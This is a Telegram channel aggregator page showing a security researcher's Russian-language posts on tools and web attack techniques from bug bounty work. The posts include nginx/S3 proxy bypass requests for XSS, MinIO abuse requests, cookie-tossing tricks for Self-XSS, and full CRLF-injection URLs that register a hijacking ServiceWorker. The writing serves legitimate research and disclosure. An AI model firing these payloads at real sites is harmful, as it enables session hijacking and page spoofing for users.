Труха⚡️Україна

Николаевский Ванёк

查看

Реальна Війна | Україна | Новини

查看

Труха⚡️Україна

查看

Николаевский Ванёк

查看

Реальна Війна | Україна | Новини

查看

BlackFan

TGlist 评分

类型公开

验证

未验证

可信度

不可靠

位置

语言其他

频道创建日期Apr 04, 2016

添加到 TGlist 的日期

Jan 25, 2025

我是频道所有者

变更历史

关联群组

BlackFan Chat

Telegram频道 BlackFan 统计数据

详细信息

订阅者

959

24 小时

20.2%一周

60.6%一个月

475.2%

引用指数

0

提及0频道上的转发0频道上的提及0

每帖平均覆盖率

1 777

12 小时4770%24 小时1 7770%48 小时4770%

参与率 (ER)

5.29%

转发92评论2反应0

覆盖率参与率 (ERR)

0%

24 小时0%一周

15.11%一个月0%

每则广告帖子的平均覆盖率

1 777

1 小时00%1 – 4 小时00%4 - 24 小时00%

详细信息

将我们的机器人连接到频道以了解该频道的受众性别。

过去 24 小时内的帖子数

0

动态

"BlackFan" 群组最新帖子

所有帖子

03.05.202510:57

Частично реализовал в BFScan поддержку аннотаций в аргументах конструктора класса.

https://github.com/BlackFan/BFScan/releases/tag/v3.1.0

Если раньше для обфусцированных APK у вас генерировалось много HTTP запросов с таким телом, то сейчас результат должен значительно улучшиться.

30.04.202506:43

Пора поддерживать тренды и тоже написать что-нибудь с AI в названии.
Сделал мини-расширение для Burp Suite Pro, использующее Burp AI функциональность для заполнения значения параметров и заголовков HTTP запроса.

https://github.com/BlackFan/Burp-Ai-Substitutor/

Его удобно использовать в случае, если вам неизвестны значения и их нужно угадывать на основе имени параметра.
Например, когда вы собираете запросы по JavaScript коду, отправляете их из Swagger / OpenAPI или сгенерировали запросы моей тулзой BFScan.

Для заполнения данными необходимо просто выделить нужный фрагмент запроса в Repeater и вызвать расширение через контекстное меню (встроенных hot-key для расширений почему-то до сих пор не завезли).
Каждый вызов тратит AI кредиты, которых по умолчанию у пользователей Burp Suite Pro сейчас по 10000.

20.03.202509:32

Изучая документацию jadx наткнулся на упоминание, что его можно подключить как библиотеку в свое Java приложение. И эта идея настолько понравилась, что в итоге вылилась в небольшой комбайн, который удобно использовать для первоначальной обработки JAR/WAR/APK приложений при анализе защищенности.

https://github.com/BlackFan/BFScan

BFScan анализирует строковые константы в Java-классах и ресурсах приложения для поиска строк, похожих на URL, пути или захардкоженные секреты.
А также формирует сырые HTTP запросы и OpenAPI спецификацию на основе конфигов, аннотаций методов и классов. При этом поддерживаются как клиентские библиотеки (например, Retrofit), используемые в APK для взаимодействия с бэкендом, так и серверные технологии, такие как Spring-аннотации. Что значительно облегчает тестирование API, когда тело HTTP запроса необходимо сформировать из десятка вложенных классов.

Рассмотрим пример работы утилиты с классом, использующим Spring-аннотации.

@RestController

В случае, если обрабатываемое приложение использует поддерживаемую библиотеку, утилита сгенерирует файл, содержащий все HTTP запросы, поддерживаемые приложением.

POST /api/createUser?someParamName=value HTTP/1.1
Host: localhost
Connection: close
Content-Type: application/json

{
  "name": "name",
  "age": 1
}

Приложение удобно использовать как для клиентских приложений, когда вы анализируете API мобильного приложения. Так и в случае, если вы получили скомпилированный JAR/WAR от серверного приложения, для поиска в нем захардкоженных секретов или дальнейшего анализа API эндпоинтов, которое оно обрабатывает.

Если приложение обфусцировано, что часто бывает с APK, утилита проанализирует все аннотации и, если они похожи на типичное объявление API эндпоинтов, построит HTTP запросы на основе них. В случае, если данная функциональность сработала неправильно, используя jadx вы можно легко сформировать mapping-файлы для переименования обфусцированных классов и корректного формирования HTTP-запросов.

23.01.202510:49

Небольшая заметка про уязвимую конфигурацию nginx при проксировании запросов на S3, которое позволило в том году налутать немного уязвимостей на BugBounty.

Объектные хранилища, совместимые с S3 API, используют два варианта указания имени бакета в запросе.

Virtual-hosted–style

GET /object-name HTTP/1.1
Host: bucket-name.s3endpoint

Path-style

GET /bucket-name/objectname HTTP/1.1
Host: s3endpoint

При использовании path-style варианта может возникнуть довольно неочевидная проблема с конфигурацией nginx.
Рассмотрим на примере сайта, который проксирует запросы подставляя имя бакета в путь с помощью следующего rewrite правила. В примерах будет использоваться Yandex Object Storage, но информация актуальна для всех S3 хранилищ.

location / {

В nginx rewrite применяется к нормализованному пути и если в нем присутствует символ переноса строки %0A, то данное регулярное выражение не сработает, поскольку в нем используются якоря начала и конца строки.

http://example.tld/test/test.html
=
https://storage.yandexcloud.net/company-bucket/test/test.html


http://example.tld/test/foo%0Abar
=
https://storage.yandexcloud.net/test/foo%0Abar

Что в результате приведет к возможности указать любое имя бакета в запросе. Причем декодированный символ %0A в имени объекта не помешает, так как S3 это не файловая система и такие имена разрешены.

Таким образом, если используется публичное объектное хранилище, атакующий может создать в нем свой бакет с произвольным именем и загрузить на него файл foo%0Abar с XSS. Символ %0A в имени объекта должен быть декодированным, поэтому проще всего загрузить объект на него с помощью PUT запроса.

В данном запросе подпись формируется с помощью Hackvertor тегов расширения для Burp Suite.

PUT /bucket-name/foo%0Abar HTTP/1.1
Host: storage.yandexcloud.net
Content-Type: text/html
Authorization: AWS ##ACCESS_KEY##:<@base64><@hex2ascii><@hmac_sha1('##SECRET-KEY##')><@d_burp_url>PUT%0A%0Atext/html%0A<@date("EEE, dd MMM yyyy HH:mm:ss z","GMT")/>%0A/bucket-name/foo%250Abar<@/d_burp_url><@/hmac_sha1><@/hex2ascii><@/base64>
Date: <@date("EEE, dd MMM yyyy HH:mm:ss z","GMT")/>
Content-Length: 25

<script>alert(1)</script>

Если же запрос попадает во внутреннее объектное хранилище, то атакующий может перебирать существующие в системе бакеты, часть из которых может разрешать создание объектов PUT запросом без авторизации. Что в результате также приведет к возможности проэксплуатировать XSS.

Но чаще встречается ситуация, когда проксирование запросов производится только из одной папки, например:

location /static/ {

Но даже в данном случае конфигурация будет уязвима из-за разницы обработок переданного пути. Правило location и rewrite работают с нормализованным путем, а proxy_pass, в котором указан URI без пути, отправит ненормализованное значение.

Таким образом для эксплуатации уязвимости необходимо отправить запрос, который в нормализованном виде попадет в location /static/, но будет начинаться с бакета, который контролирует атакующий.

http://example.tld/attacker-bucket/..%2Fstatic/foo%0Abar
=
https://storage.yandexcloud.net/attacker-bucket/..%2Fstatic/foo%0Abar

Как и в прошлом примере наличие в имени объекта символов %0A и /../ не помешают эксплуатации, так как это не файловая система и такой объект можно создать PUT запросом.

Также, если вы планируете искать подобные мисконфиги блэкбоксом, то нужно учитывать, что ошибки NoSuchObject и NoSuchBucket часто заменяют на дефолтную страницу 404, что может помешать.
Обойти это можно вызывая ошибки с кодом, отличным от 404, например отправляя PUT запрос без указания Content-Length.

PUT /attacker-bucket/..%2Fstatic/foo%0Abar HTTP/1.1
Host: example.tld
Connection: close

15.12.202411:03

Сейчас появилась целая куча всевозможных облачных и локальных решений, совместимых с S3.
И помимо самого S3 API, в них могут быть реализованы и какие-нибудь свои фишки, которые важно знать.

Например, MinIO поддерживает листинг содержимого ZIP архивов и получение файлов из них.

Для использования данной функциональности необходимо чтобы объект в бакете имел расширение zip (проверяется по подстроке ".zip/") и HTTP запрос содержал дополнительный заголовок x-minio-extract.

Листинг содержимого архива:

GET /bucket/?prefix=archive.zip/&list-type=2 HTTP/1.1

Получение файла из архива:

GET /bucket/archive.zip/test.html HTTP/1.1

В специфичных условиях подобное поведение может быть использовано для XSS если:
• Атакующий контролирует содержимое и имя объекта, но не контролирует Content-Type (в таки случаях также нужно проверять параметр response-content-type)
• Запросы к объектам кэшируются

Закэшировав XSS в ответе используя x-minio-extract, её можно будет использовать против других клиентов, так как этот заголовок не будет использоваться в ключе кэша.

Еще одна интересная функциональность в MinIO - подпись на события в бакете.
В случае, если бакет настроен небезопасно и для него разрешен action s3:ListenBucketNotification, это позволяет в режиме реального времени получать информацию о внутреннем адресе MinIO, изменениях объектов или запросах пользователей к объектам, включая IP адрес и User-Agent.

Пример запроса (Полный список событий):

curl "http://127.0.0.1:9000/bucket/?events=s3:ObjectAccessed:*&ping=1"

21.11.202406:59

Еще немного client-side дроча на тему Self-XSS.

Иногда есть необходимость используя XSS или CRLF Injection на одном поддомене, где нет ничего интересного, проэксплуатировать Self-XSS на другом поддомене, где расположено основное приложение с сессией пользователя.

Обычно это реализуется следующим образом:
1) Подготавливается сессия атакующего с Self-XSS, которая срабатывает на странице /foo/bar
2) С помощью CRLF Injection в браузер жертвы добавляется еще одна cookie с сессией атакующего на путь /foo/bar

Set-Cookie: sessionid=<attacker_session>; domain=.company.tld; path=/foo/bar; secure; samesite=none;

Так как у оригинальной сессии другой атрибут path, то добавленная cookie не перезапишет оригинальную.
На всем сайте пользователь будет авторизован в своей сессии, а на странице /foo/bar отправляется следующий заголовок.

Cookie: sessionid=<attacker_session>; sessionid=<victim_session>;

То есть cookie с сессией атакующего отправляется первой в заголовке, так как у нее большее совпадение префикса path. Веб-приложение в соответствии с RFC берет первое значение в качестве результирующего. И получается, что только на странице /foo/bar пользователь авторизован в сессии атакующего, в которой срабатывает XSS. Что позволяет выполнять действия от имени оригинальной сессии пользователя, отправляя запросы на другие пути.

Но что делать, если веб-приложение берет последнее значение при одинаковых ключах у сессионной cookie?

Если повторять трюк с path, то сессия атакующего будет идти первой и проигнорируется.
Если устанавливать одинаковый path, то оригинальная сессия пользователя будет перезаписана и атака теряет смысл (хотя это все еще может использоваться как CRLF Injection -> XSS, но теперь требуется третья уязвимость для демонстрации импакта).

Иногда в таком случае может помочь создание похожей cookie, которая воспринимается веб-сервером наравне с оригинальной sessionid, а для браузера как две разных.

sessionID=value;
"sessionid"=value;
sessionid =value;    (кажется уже зафикшено)
x=x,sessionid=value;

Такую cookie тоже не всегда удается найти.

Но недавно появившийся атрибут cookie Partitioned, предназначенный для раздельного хранилища cookie сайтов верхнего уровеня, позволяет в Chrome создать две cookie с одинаковыми названиями и атрибутами domain и path.

Set-Cookie: sessionid=<attacker_session>; domain=.company.tld; path=/; secure; samesite=none; partitioned;

В результате чего браузер жертвы в каждом запросе будет отправлять две сессии. Cookie атакующего будет идти последней и Self XSS отработает.

Чтобы "выйти" из сессии атакующего после того, как XSS сработала, можно через JavaScript удалить добавленную cookie и в текущей странице выполнять произвольные действия уже от имени оригинальной сессии.

Подробнее про CHIPS Cookie: https://developers.google.com/privacy-sandbox/cookies/chips?hl=ru

10.11.202412:02

Ну и раз я вспомнил, что у меня есть Telegram канал - нужно запостить что-то полезное)

Если вы обнаружили CRLF Injection, которая позволяет перезаписать HTTP ответ и сделать XSS, - то ее импакт можно увеличить с помощью ServiceWorker.

Для регистрации ServiceWorker необходимо:
1) Иметь возможность выполнения JavaScript в контексте сайта
2) Наличие JavaScript файла на сервере с корректным Content-Type

Используя CRLF Injection оба этих условия легко выполняются:

XSS

https://example.tld/some/path/foo/bar/?param=x%0D%0AContent-Type:text/html%0D%0AContent-Length:20%0D%0A%0D%0A<script>XSS</script>

JS файл

https://example.tld/some/path/foo/bar/?param=x%0D%0AContent-Type:text/javascript%0D%0AContent-Length:7%0D%0A%0D%0AJS_file

Но остается проблема, что запросы, которые контролируются ServiceWorker, будут ограничены его scope.
То есть папкой, в которой у нас сработала CRLF Injection. В данном случае это /some/path/foo/bar/, что не очень интересно.

Но если почитать документацию, то можно узнать о заголовке Service-Worker-Allowed, который устанавливается в HTTP ответе вместе с JS кодом воркера, и через который можно переопределить scope.
Что в случае с CRLF Injection позволяет зарегистрировать ServiceWorker, расположенный в любой папке, на корень сайта.

Для этого формируем код ServiceWorker с Service-Worker-Allowed:/, который подменяет все HTTP ответы на строку Fake response.

https://example.tld/some/path/foo/bar/?param=x%0D%0AService-Worker-Allowed:/%0D%0AContent-Type:text/javascript%0D%0AContent-Length:162%0D%0A%0D%0Aself.addEventListener(%22fetch%22,function(event){event.respondWith(new%20Response(%22Fake%20response%22,{status:200,statusText:%22OK%22,headers:{%22Content-Type%22:%22text/html%22}}))})

И подключаем его через XSS.

https://example.tld/some/path/foo/bar/?param=x%0D%0AContent-Type:text/html%0D%0AContent-Length:378%0D%0A%0D%0A%3Cscript%3Enavigator.serviceWorker.register('/some/path/foo/bar/?param=x%250D%250AService-Worker-Allowed:/%250D%250AContent-Type:text/javascript%250D%250AContent-Length:162%250D%250A%250D%250Aself.addEventListener(%2522fetch%2522,function(event){event.respondWith(new%2520Response(%2522Fake%2520response%2522,{status:200,statusText:%2522OK%2522,headers:{%2522Content-Type%2522:%2522text/html%2522}}))})',{scope:'/'})%3C/script%3E

Также иногда бывает, что не получается сформировать валидный JS ограничивая HTTP ответ по длине с помощью Content-Length. В таком случае можно отбросить лишнее в ответе с помощью формирования HTTP ответа с Transfer-Encoding:chunked.

https://example.tld/some/path/foo/bar/?param=x%0D%0AContent-Type:text/javascript%0D%0ATransfer-Encoding:chunked%0D%0A%0D%0A7%0D%0AJS_file%0D%0A0%0D%0A%0D%0A

10.11.202410:29

Недавно отправил 800-ый оплаченный отчет в BugBounty.
А вы как-то ведете статистику по своим багам?

13.08.202415:57

А еще я налутал пачку CVE.
Правда часть из них без упоминания автора ¯\_(ツ)_/¯

Oracle E-Business Suite
CVE-2024-21071 RCE
CVE-2024-21074 SQL Injection
CVE-2024-21075 SQL Injection
CVE-2024-21080 SQL Injection
CVE-2024-21143 Unvalidated Forward

Oracle Critical Patch Update - April 2024
Oracle Critical Patch Update - July 2024

Xibo CMS
CVE-2024-41802 SQL Injection
CVE-2024-41803 SQL Injection
CVE-2024-41804 SQL Injection
CVE-2024-41944 SQL Injection

Xibo CMS Security Advisory

Thruk
CVE-2024-39915 RCE

Thruk Security

12.08.202417:32

В Standoff появились раскрытые отчеты. Я запросил раскрытие нескольких необычных уязвимостей, в основном связанных с Client-Side.
Пока что открыли только XSS через third-party скрипты от Сalltouch, эксплуатация которой требовала целой кучи мелких фишек.

https://bugbounty.standoff365.com/disclosed-reports/4/